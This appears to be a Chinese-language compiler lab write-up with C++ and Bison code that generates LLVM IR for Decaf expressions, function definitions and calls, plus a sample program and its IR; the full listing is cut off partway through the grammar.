8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
// Generate IR for an expression node, dispatching on des.kind:
//   valueK - constant/variable: delegate to decafAllexp::Codegen
//   expuK  - unary operator applied to Exp1
//   expbK  - binary operator applied to Exp1 and Exp2
//   funcK  - function call: delegate to decafFunCall::Codegen
// Returns the generated value, or 0/NULL when an operand failed to generate
// or the kind/operator is not recognised.
llvm::Value *decafBinexp::Codegen() {
    if (this->des.kind == valueK) {
        decafAllexp *exp = (decafAllexp *)this;
        return exp->Codegen();
    }

    if (this->des.kind == expuK) {
        llvm::Value *L = Exp1->Codegen();
        if (L == 0) {
            return 0;
        }
        switch (this->get_op(Option)) {
            case nottmp:
                this->des.value = Builder.CreateNot(L, "nottmp");
                break;
            case negtmp:
                this->des.value = Builder.CreateNeg(L, "negtmp");
                break;
            default:
                // Unknown unary operator: do not hand back a stale value.
                this->des.value = NULL;
                break;
        }
        return this->des.value;
    }

    if (this->des.kind == expbK) {
        llvm::Value *L = Exp1->Codegen();
        llvm::Value *R = Exp2->Codegen();
        if (L == 0 || R == 0) {
            return 0;
        }

        switch (this->get_op(Option)) {
            case addtmp:
                this->des.value = Builder.CreateAdd(L, R, "addtmp");
                break;
            case subtmp:
                this->des.value = Builder.CreateSub(L, R, "subtmp");
                break;
            case multmp:
                this->des.value = Builder.CreateMul(L, R, "multmp");
                break;
            case remtmp:
                this->des.value = Builder.CreateSRem(L, R, "remtmp");
                break;
            case divtmp:
                this->des.value = Builder.CreateSDiv(L, R, "divtmp");
                break;
            case ortmp:
                this->des.value = Builder.CreateOr(L, R, "ortmp");
                break;
            case andtmp:
                this->des.value = Builder.CreateAnd(L, R, "andtmp");
                break;
            case eqtmp:
                this->des.value = Builder.CreateICmpEQ(L, R, "eqtmp");
                break;
            case netmp:
                this->des.value = Builder.CreateICmpNE(L, R, "netmp");
                break;
            case slttmp:
                this->des.value = Builder.CreateICmpSLT(L, R, "slttmp");
                break;
            case sgttmp:
                this->des.value = Builder.CreateICmpSGT(L, R, "sgttmp");
                break;
            case sletmp:
                this->des.value = Builder.CreateICmpSLE(L, R, "sletmp");
                break;
            case sgetmp:
                this->des.value = Builder.CreateICmpSGE(L, R, "sgetmp");
                break;
            case shltmp:
                this->des.value = Builder.CreateShl(L, R, "shltmp");
                break;
            case shrtmp:
                this->des.value = Builder.CreateLShr(L, R, "shrtmp");
                break;
            default:
                this->des.value = NULL;
                break;
        }
        return this->des.value;
    }

    if (this->des.kind == funcK) {
        decafFunCall *call = (decafFunCall *)this;
        this->des.value = call->Codegen();
        return this->des.value;
    }

    // Unrecognised kind: previously control fell off the end of a non-void
    // function, which is undefined behaviour.
    return NULL;
}
  • 其实就是把对 decafAllexp decafBinexp decafUnaryexp 的处理都整合到了 decafBinexp::Codegen
  • 最后一个函数调用的处理其实是特殊情况,我为了方便就直接把它放到这个地方了
  • 对于 “语句Stmt” 的处理也可以使用上述思路(本实验没有要求处理 “语句Stmt”)

参考以下案例:对于函数定义和函数调用的处理

1
2
3
4
5
6
7
8
9
10
11
extern func print_int(int) void;

package Test {
func main() int {
test(10, 13);
}
func test(a int, b int) void {
print_int(a);
print_int(b);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
; ModuleID = 'Test'
source_filename = "DecafExpr"

declare void @print_int(i32)

define i32 @main() {
entry:
call void @test(i32 10, i32 13)
ret i32 0
}

define void @test(i32 %a, i32 %b) {
entry:
%a1 = alloca i32
store i32 %a, i32* %a1
%b2 = alloca i32
store i32 %b, i32* %b2
%a3 = load i32, i32* %a1
call void @print_int(i32 %a3)
%b4 = load i32, i32* %b2
call void @print_int(i32 %b4)
ret void
}
  • 这个案例有一个特点:在定义 test 前,先在 main 中调用了 test
  • 为了实现这个效果,我将 “函数定义” 的相关操作拆为两部分,分别放入 decafFuncDef::Codegen 和 method_decl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// Generate the body of a function whose llvm::Function (this->lfunc) was
// already created and registered by the method_decl grammar action.
//
// Creates the entry block, spills every argument into an alloca registered
// under the parameter's name, generates the block, and appends a default
// return when no return statement cleared get_return.
// Returns this->lfunc. When the name is not registered as a function, nothing
// is emitted.
//
// Throws std::runtime_error when a parameter name cannot be registered in the
// symbol table.
llvm::Value *decafFuncDef::Codegen() {
    if (!check_symbol(this->get_name(), funcK)) {
        return this->lfunc;
    }

    // Set to true here; decafReturn::Codegen clears it.
    get_return = true;

    llvm::BasicBlock *BB = llvm::BasicBlock::Create(TheContext, "entry", this->lfunc);
    Builder.SetInsertPoint(BB);

    int i = 0;
    for (auto p : this->get_para()->get_para()) {
        llvm::Argument *arg = this->lfunc->getArg(i++);
        arg->setName(p->get_name());

        descriptor *des2 = new descriptor();
        if (!put_symbol(p->get_name(), des2)) {
            // Previously the store below went through an unset alloc pointer.
            delete des2;
            throw std::runtime_error("cannot register parameter (name already in use): " +
                                     std::string(p->get_name()));
        }
        des2->alloc = Builder.CreateAlloca(p->lType, 0, p->get_name());
        des2->kind = valueK;
        Builder.CreateStore(arg, des2->alloc);
    }

    decafBlock *B = this->get_block();
    B->Codegen();

    if (get_return) {
        if (this->lType->isVoidTy()) {
            Builder.CreateRetVoid();
        } else {
            // Zero of the declared return type (i32 0 for int, i1 false for
            // bool) rather than a hard-coded i32.
            Builder.CreateRet(llvm::Constant::getNullValue(this->lType));
        }
    }
    return this->lfunc;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
// Build the AST node for the function definition from the rule's components:
// $2 = name, $4 = parameter list, $6 = return type, $7 = body block.
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafBlock * block = (decafBlock*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type);
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;

// Declare the LLVM function right away, while parsing, so that calls which
// appear before the definition can already find it in the symbol table.
// The body is emitted later by decafFuncDef::Codegen.
// NOTE(review): when put_symbol returns 0 (name already registered), des is
// neither stored nor freed and func->lfunc is never assigned -- confirm
// whether a redeclaration should be reported as an error here.
descriptor* des = new descriptor();
if(put_symbol( func->get_name(), des)){
// func->lType is presumably filled in by put_type above -- TODO confirm.
llvm::Type *returnTy = func->lType;
std::vector<llvm::Type *> functionArgs;
for(auto p:func->get_para()->get_para()){
functionArgs.push_back(p->lType);
}

func->lfunc = llvm::Function::Create(
llvm::FunctionType::get(returnTy, functionArgs ,false),
llvm::Function::ExternalLinkage,
func->get_name(),
TheModule);
if (func->lfunc == 0) {
throw runtime_error("empty function block");
}

// Record the function in its descriptor so call sites can reach it.
des->func = func->lfunc;
des->kind = funcK;
}
}
;

完整代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
%{
#include <iostream>
#include <ostream>
#include <stdexcept>
#include <string>
#include <cstdlib>
#include "default-defs.h"
#include "decafexpr.cc"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = false;

using namespace std;

// this global variable contains all the generated code
llvm::Module *TheModule;

// A symbol table maps an identifier to its descriptor.
typedef map<string, descriptor* > symbol_table;
// A list of symbol tables, one per open block scope.
typedef list<symbol_table > symbol_table_list;
// Flat table used by get_symbol / put_symbol / check_symbol.
symbol_table symtbl;
// Scope stack used by get_symbolt / put_symbolt; decafBlock::Codegen pushes a
// fresh table at the front on entry and pops it on exit.
symbol_table_list symtblt;

// this is the method used to construct the LLVM intermediate code (IR)
llvm::LLVMContext TheContext;
llvm::LLVMContext &Context = TheContext;
llvm::IRBuilder<> Builder(TheContext);
// the calls to TheContext in the init above and in the
// following code ensures that we are incrementally generating
// instructions in the right order

// dummy main function
// WARNING: this is not how you should implement code generation
// for the main function!
// You should write the codegen for the main method as
// part of the codegen for method declarations (MethodDecl)
static llvm::Function *TheFunction = 0;
// Cleared by decafReturn::Codegen once an explicit return has been emitted.
static bool get_return;

// Look up `name` in the scope stack, front scope first, and return the first
// descriptor found, or NULL when no scope contains the name.
descriptor *get_symbolt(string name){
    // Iterate by const reference (iterating by value copies each scope's map)
    // and use the map's own keyed lookup instead of scanning every entry.
    for (const auto &scope : symtblt) {
        symbol_table::const_iterator hit = scope.find(name);
        if (hit != scope.end()) {
            return hit->second;
        }
    }
    return NULL;
}

// Return the descriptor registered for `name` in the flat table `symtbl`,
// or NULL when the name is not present.
descriptor *get_symbol(string name){
    // Keyed lookup replaces the former linear scan over every entry.
    symbol_table::iterator it = symtbl.find(name);
    if (it == symtbl.end()) {
        return NULL;
    }
    return it->second;
}

// Register `des` under `name` in the front scope of the scope stack.
// Returns 1 when stored, 0 when the name already has a non-NULL descriptor.
int put_symbolt(string name, descriptor * des){
    // operator[] creates a NULL entry for an unknown name, as before.
    descriptor *&slot = symtblt.front()[name];
    if (slot == NULL) {
        slot = des;
        return 1;
    }
    return 0;
}

// Register `des` under `name` in the flat table `symtbl`.
// Returns 1 when stored, 0 when the name already has a non-NULL descriptor.
int put_symbol(string name, descriptor * des){
    // operator[] creates a NULL entry for an unknown name, as before.
    descriptor *&slot = symtbl[name];
    if (slot == NULL) {
        slot = des;
        return 1;
    }
    return 0;
}

// Return true when `name` is registered in `symtbl` with a descriptor whose
// kind equals `k`.
bool check_symbol(string name, llvmValue k){
    // Keyed lookup replaces the former linear scan. The NULL test guards
    // entries that put_symbol's operator[] created without a descriptor.
    symbol_table::iterator it = symtbl.find(name);
    return it != symtbl.end() && it->second != NULL && it->second->kind == k;
}

// Generate a block: open a new scope, emit the field declarations and then
// the statements (each only if present), close the scope again.
// Returns the value of whichever list was generated last, or NULL.
llvm::Value * decafBlock::Codegen() {
    symtblt.push_front(symbol_table());

    llvm::Value *result = NULL;
    if (FieldDeclList != NULL) {
        result = FieldDeclList->Codegen();
    }
    if (StateDeclList != NULL) {
        result = StateDeclList->Codegen();
    }

    symtblt.pop_front();
    return result;
}

// Dispatch on the statement tag and forward to the matching Codegen:
// assignment, function call, nested block or return. Any other kind
// generates nothing and yields NULL.
llvm::Value * decafStmt::Codegen() {
    if (this->kind == dass) {
        return ((decafAssign *)this)->Codegen();
    }
    if (this->kind == dcall) {
        return ((decafFunCall *)this)->Codegen();
    }
    if (this->kind == dblo) {
        return ((decafBlock *)this)->Codegen();
    }
    if (this->kind == dret) {
        return ((decafReturn *)this)->Codegen();
    }
    return NULL;
}

// Emit a call to the function named by this node.
//
// Each argument expression is generated and then zero-extended to the
// callee's declared parameter type (e.g. an i1 boolean passed to an i32
// parameter). Returns the call instruction.
//
// Throws std::runtime_error when the callee is not in the symbol table, when
// an argument fails to generate, or when the argument count does not match
// the callee's parameter list.
llvm::Value * decafFunCall::Codegen() {
    descriptor *des = get_symbol(this->get_name());
    if (des == NULL || des->func == NULL) {
        throw std::runtime_error("call to undeclared function: " + std::string(this->get_name()));
    }
    llvm::Function *llvm_func = des->func;

    // Declared parameter types of the callee, in order.
    std::vector<llvm::Type *> param_types;
    for (auto &arg : llvm_func->args()) {
        param_types.push_back(arg.getType());
    }

    std::vector<llvm::Value *> call_args;
    for (auto p : this->get_para()) {
        const size_t idx = call_args.size();
        if (idx >= param_types.size()) {
            throw std::runtime_error("too many arguments in call to: " + std::string(this->get_name()));
        }
        decafBinexp *exp = (decafBinexp *)p;
        llvm::Value *vt = exp->Codegen();
        if (vt == NULL) {
            throw std::runtime_error("invalid argument in call to: " + std::string(this->get_name()));
        }
        // Widen to the parameter type; a value that already has that type is
        // passed through without emitting a cast.
        call_args.push_back(Builder.CreateZExt(vt, param_types[idx], "zexttmp"));
    }
    if (call_args.size() != param_types.size()) {
        throw std::runtime_error("too few arguments in call to: " + std::string(this->get_name()));
    }

    return Builder.CreateCall(llvm_func, call_args);
}

// Generate `var = exp`: evaluate the right-hand side, then store its value
// into the stack slot recorded for the variable in the scoped symbol table.
//
// Throws runtime_error when the variable has no descriptor or the expression
// produced no value; both cases previously reached CreateStore with a null
// pointer.
//
// Returns the descriptor's `value` member, which shares storage with `alloc`
// in the descriptor union, so callers receive the variable's alloca.
llvm::Value * decafAssign::Codegen() {
    decafBinexp* exp = this->get_exp();
    exp->Codegen();

    descriptor * des = get_symbolt(this->get_var());
    if (des == NULL) {
        throw runtime_error("assignment to undeclared variable " + this->get_var());
    }
    if (exp->des.value == NULL) {
        throw runtime_error("invalid expression assigned to " + this->get_var());
    }

    Builder.CreateStore(exp->des.value, des->alloc);
    return des->value;
}

// Generate a return statement. With an expression the expression is
// evaluated and returned; without one a `ret void` is emitted. In both cases
// get_return is cleared so the enclosing function definition knows an
// explicit return was produced.
// Returns the returned value, or NULL for a void return.
llvm::Value * decafReturn::Codegen() {
    decafBinexp* result = this->get_exp();
    if (!result) {
        Builder.CreateRetVoid();
        get_return = 0;
        return NULL;
    }

    result->Codegen();
    Builder.CreateRet(result->des.value);
    get_return = 0;
    return result->des.value;
}

// Generate code for an expression node, branching on the descriptor kind
// because Codegen is not virtual:
//   valueK - leaf (variable / constant): handled by decafAllexp::Codegen
//   expuK  - unary operator applied to Exp1
//   expbK  - binary operator applied to Exp1 and Exp2
//   funcK  - method call: handled by decafFunCall::Codegen
// The result is cached in des.value and returned. A failed operand yields 0.
// Any other kind yields NULL; previously control ran off the end of the
// function in that case, which is undefined behaviour.
llvm::Value *decafBinexp::Codegen() {
    if(this->des.kind == valueK){
        decafAllexp * exp = (decafAllexp *)this;
        return exp->Codegen();
    }
    else if(this->des.kind == expuK){
        llvm::Value *L = Exp1->Codegen();
        if (L == 0) {
            return 0;
        }
        switch (this->get_op(Option)) {
            case nottmp:
                this->des.value = Builder.CreateNot(L, "nottmp");
                break;
            case negtmp:
                this->des.value = Builder.CreateNeg(L , "negtmp");
                break;
            default:
                // Unknown unary operator: des.value is left as it was.
                break;
        }
        return this->des.value;
    }
    else if(this->des.kind == expbK){
        llvm::Value *L = Exp1->Codegen();
        llvm::Value *R = Exp2->Codegen();
        if (L == 0 || R == 0) {
            return 0;
        }

        switch (this->get_op(Option)) {
            case addtmp:
                this->des.value = Builder.CreateAdd(L, R, "addtmp");
                break;
            case subtmp:
                this->des.value = Builder.CreateSub(L, R, "subtmp");
                break;
            case multmp:
                this->des.value = Builder.CreateMul(L, R, "multmp");
                break;
            case remtmp:
                this->des.value = Builder.CreateSRem(L, R, "remtmp");
                break;
            case divtmp:
                this->des.value = Builder.CreateSDiv(L, R, "divtmp");
                break;
            case ortmp:
                this->des.value = Builder.CreateOr(L, R, "ortmp");
                break;
            case andtmp:
                this->des.value = Builder.CreateAnd(L, R, "andtmp");
                break;
            case eqtmp:
                this->des.value = Builder.CreateICmpEQ(L, R, "eqtmp");
                break;
            case netmp:
                this->des.value = Builder.CreateICmpNE(L, R, "netmp");
                break;
            case slttmp:
                this->des.value = Builder.CreateICmpSLT(L, R, "slttmp");
                break;
            case sgttmp:
                this->des.value = Builder.CreateICmpSGT(L, R, "sgttmp");
                break;
            case sletmp:
                this->des.value = Builder.CreateICmpSLE(L, R, "sletmp");
                break;
            case sgetmp:
                this->des.value = Builder.CreateICmpSGE(L, R, "sgetmp");
                break;
            case shltmp:
                this->des.value = Builder.CreateShl(L, R, "shltmp");
                break;
            case shrtmp:
                // Logical (zero-filling) right shift.
                this->des.value = Builder.CreateLShr(L, R, "shrtmp");
                break;
            default:
                this->des.value = NULL;
                break;
        }
        return this->des.value;
    }
    else if(this->des.kind == funcK){
        decafFunCall * call = (decafFunCall *)this;
        this->des.value = call->Codegen();
        return this->des.value;
    }
    // No recognised expression kind.
    return NULL;
}

// Generate code for a leaf expression, selected by the node's kind string:
//   "VariableExpr"   - load from the variable's stack slot
//   "NumberExpr"     - 32-bit integer constant; a leading "0x" selects base 16
//   "BoolExpr"       - 1-bit constant for "True" / "False"
//   "StringConstant" - global string plus a pointer to its first character
// The result is cached in des.value and returned; an unrecognised kind (or an
// unrecognised bool spelling) leaves des.value as it was.
llvm::Value *decafAllexp::Codegen() {
    const string kind = this->get_kind();
    const string text = this->get_name();

    if (kind == "VariableExpr") {
        descriptor * des = get_symbolt(text);
        this->des.value = Builder.CreateLoad(des->alloc, text);
    }
    else if (kind == "NumberExpr") {
        const int base = (text.substr(0, 2) == "0x") ? 16 : 10;
        llvm::Value* number = llvm::ConstantInt::get(llvm::Type::getInt32Ty(Context), std::stoi(text, NULL, base));
        this->des.value = number;
    }
    else if (kind == "BoolExpr") {
        if (text == "True" || text == "False") {
            llvm::Type* boolType = llvm::Type::getInt1Ty(Context);
            llvm::Constant* flag = llvm::ConstantInt::get(boolType, text == "True" ? 1 : 0);
            this->des.value = flag;
        }
    }
    else if (kind == "StringConstant") {
        llvm::GlobalVariable *GS = Builder.CreateGlobalString(text, "globalstring");
        this->des.value = Builder.CreateConstGEP2_32(GS->getValueType(), GS, 0, 0, "cast");
    }
    return this->des.value;
}

// Declare this variable in the current scope: allocate a stack slot of the
// variable's LLVM type and record it in a new descriptor.
// When the name is already bound in the current scope nothing is emitted and
// the freshly allocated descriptor is released (it used to be leaked).
// Returns this node's Alloca member.
llvm::Value *decafVar::Codegen() {
    descriptor * des = new descriptor();
    if(put_symbolt(this->get_name(),des)){
        this->Alloca = Builder.CreateAlloca(this->lType, 0, this->get_name());
        des->alloc = this->Alloca;
        des->kind = valueK;
    }
    else{
        // put_symbolt did not store the descriptor, so it is still ours.
        delete des;
    }
    return this->Alloca;
}

// An extern declaration emits no code of its own: the llvm::Function is
// created when the declaration is parsed. Returns that function when the name
// is registered as a function in the symbol table, otherwise 0.
// (The unused descriptor lookup that preceded the check was removed.)
llvm::Value *decafEXFuncDef::Codegen() {
    if(check_symbol( this->get_name(), funcK)){
        return this->lfunc;
    }
    return 0;
}

// Generate the body of a method whose llvm::Function was created at parse
// time.
//
// Steps: open a scope, create the "entry" block, spill every parameter into
// its own stack slot registered under the parameter's name, generate the
// method block, and append an implicit return when the body did not emit one
// (get_return still set).
//
// Fixes relative to the previous version:
//  - the implicit return now uses the zero value of the declared return type;
//    it was always `i32 0`, which is ill-typed for a bool method;
//  - a parameter whose name is already bound is skipped and its descriptor is
//    freed instead of being leaked and stored through a null alloca;
//  - the unused descriptor lookup was removed.
//
// Returns the method's llvm::Function (also when the name is not registered
// as a function, in which case nothing is generated).
llvm::Value *decafFuncDef::Codegen() {
    if(!check_symbol( this->get_name(), funcK)){
        return this->lfunc;
    }

    symtblt.push_front(symbol_table());
    get_return = true;
    llvm::BasicBlock *BB = llvm::BasicBlock::Create(TheContext, "entry", this->lfunc);
    Builder.SetInsertPoint(BB);

    int i = 0;
    for(auto p:this->get_para()->get_para()){
        auto *arg = this->lfunc->getArg(i++);
        arg->setName(p->get_name());

        descriptor * slot = new descriptor();
        if(!put_symbolt(p->get_name(),slot)){
            // Duplicate parameter name: keep the first binding.
            delete slot;
            continue;
        }
        slot->alloc = Builder.CreateAlloca(p->lType, 0, p->get_name());
        slot->kind = valueK;
        Builder.CreateStore(arg,slot->alloc);
    }

    decafBlock * B = this->get_block();
    B->Codegen();

    if(get_return){
        // The body emitted no return statement: terminate the function.
        if(this->lType->isVoidTy())
            Builder.CreateRetVoid();
        else
            Builder.CreateRet(llvm::Constant::getNullValue(this->lType));
    }

    // Close the method scope and drop any remaining scoped tables.
    symtblt.pop_front();
    symtblt.clear();
    return this->lfunc;
}

// Create the top-level definition of `main` (no parameters, 32-bit integer
// result), give it an "entry" basic block, point the IR builder at that
// block, and register the function in the symbol table under "main".
// Throws runtime_error if the function object could not be created.
llvm::Function *gen_main_def() {
    llvm::FunctionType *mainTy = llvm::FunctionType::get(llvm::IntegerType::get(TheContext, 32), false);
    llvm::Function *mainFn = llvm::Function::Create(mainTy, llvm::Function::ExternalLinkage, "main", TheModule);
    if (!mainFn) {
        throw runtime_error("empty function block");
    }

    // Every instruction built after this point is appended to the entry block.
    llvm::BasicBlock *entry = llvm::BasicBlock::Create(TheContext, "entry", mainFn);
    Builder.SetInsertPoint(entry);

    descriptor* record = new descriptor();
    record->func = mainFn;
    record->kind = funcK;
    put_symbol("main", record);

    return mainFn;
}

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while lvalues state_for state_break state_continue state_return exp assign assigns assignss method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage var_declp var_declps extern_def extern_defn extern_typen extern_type func_typen func_type method_type type

%right T_ASSIGN
%left T_OR
%left T_AND
%left T_EQ T_NEQ T_LT T_GT T_GEQ T_LEQ
%left T_PLUS T_MINUS
%left T_MULT T_DIV T_MOD T_RIGHTSHIFT T_LEFTSHIFT
%right T_NOT
%right T_UMINUS
%right T_LPAREN
%left T_RPAREN
%nonassoc T_IF
%nonassoc T_ELSE

%%

/* Start symbol: a complete input is exactly one program. */
start: program

/* program: extern declarations followed by one package.
   The action builds the root AST node, runs code generation over it, prints
   the AST when printAST is set, and finally frees the node. */
program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafEXFuncDefList *)$1, (PackageAST *)$2);
prog->Codegen();
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

/* extern_list: zero or more extern declarations, as a decafEXFuncDefList.
   The empty case is produced by extern_defn's own empty alternative; the
   second empty alternative that used to live here derived the same empty
   input a second way and caused a reduce/reduce conflict. */
extern_list: extern_defn {
        $$ = $1;
    }
    ;

/* extern_defn: right-recursive list of extern declarations. Each declaration
   is pushed on the front of the list built for the declarations after it, so
   the list ends up in source order. */
extern_defn: extern_def extern_defn {
        decafEXFuncDefList *rest = (decafEXFuncDefList *)$2;
        rest->push_front((decafEXFuncDef *)$1);
        $$ = rest;
    }
    | /* empty */ {
        $$ = new decafEXFuncDefList();
    }
    ;

/* extern_def: `extern func NAME(types) rettype;`
   Builds the AST node and, the first time NAME is seen, creates the external
   llvm::Function and records it in the symbol table as a function.
   When NAME is already registered the new descriptor is freed (it used to be
   leaked) and no second llvm::Function is created. */
extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
        decafEXFuncDef *func = new decafEXFuncDef();
        func->put_name($3);
        func->put_type((decafType *)$7);
        func->put_para((decafPara *)$5);
        $$ = func;
        delete $3;

        descriptor* des = new descriptor();
        if (put_symbol(func->get_name(), des)) {
            llvm::Type *returnTy = func->lType;
            string Name = func->get_name();
            llvm::SmallVector<llvm::Type *,0> functionArgs;
            for (auto p : func->get_para()->get_para()) {
                functionArgs.push_back(p->lType);
            }
            func->lfunc = llvm::Function::Create(
                llvm::FunctionType::get(returnTy, functionArgs, false),
                llvm::Function::ExternalLinkage,
                Name,
                TheModule
            );
            des->func = func->lfunc;
            des->kind = funcK;
        }
        else {
            /* put_symbol did not store the descriptor, so it is still ours. */
            delete des;
        }
    }
    ;

/* para_list_use: the (possibly empty) argument list of a call, as a
   decafStmtList. */
para_list_use: para_usen { $$ = $1; }
    | /* empty */ { $$ = new decafStmtList(); }
    ;

/* para_usen: one or more comma-separated call arguments; each argument is
   pushed on the front of the list built for the arguments after it. */
para_usen: para_use T_COMMA para_usen {
        decafStmtList *rest = (decafStmtList *)$3;
        rest->push_front($1);
        $$ = rest;
    }
    | para_use {
        decafStmtList *single = new decafStmtList();
        single->push_front($1);
        $$ = single;
    }
    ;

/* para_use: a single call argument; it is just an expression node. */
para_use: exp { $$ = $1;}
;

/* para_list_def: the parameter list of an extern declaration (types only) or
   of a method definition (name + type pairs), possibly empty.
   Both users of this rule cast the value to decafPara*, so the empty
   alternative now builds an empty decafPara; it used to build a
   decafStmtList, which was then accessed through the wrong class. */
para_list_def: extern_typen {
        $$ = $1;
    }
    | func_typen {
        $$ = $1;
    }
    | /* empty */ {
        $$ = new decafPara();
    }
    ;

/* func_typen: one or more comma-separated `name type` parameters, collected
   front-first into a decafPara. */
func_typen: func_type T_COMMA func_typen {
        decafPara *rest = (decafPara *)$3;
        rest->push_front((decafType *)$1);
        $$ = rest;
    }
    | func_type {
        decafPara *single = new decafPara();
        single->push_front((decafType *)$1);
        $$ = single;
    }
    ;

/* func_type: a named parameter; the type node is reused and tagged with the
   parameter's name. */
func_type: T_ID extern_type {
        decafType *named = (decafType *)$2;
        named->put_name(*$1);
        delete $1;
        $$ = named;
    }
    ;

/* extern_typen: one or more comma-separated parameter types, collected
   front-first into a decafPara. */
extern_typen: extern_type T_COMMA extern_typen {
        decafPara *rest = (decafPara *)$3;
        rest->push_front((decafType *)$1);
        $$ = rest;
    }
    | extern_type {
        decafPara *single = new decafPara();
        single->push_front((decafType *)$1);
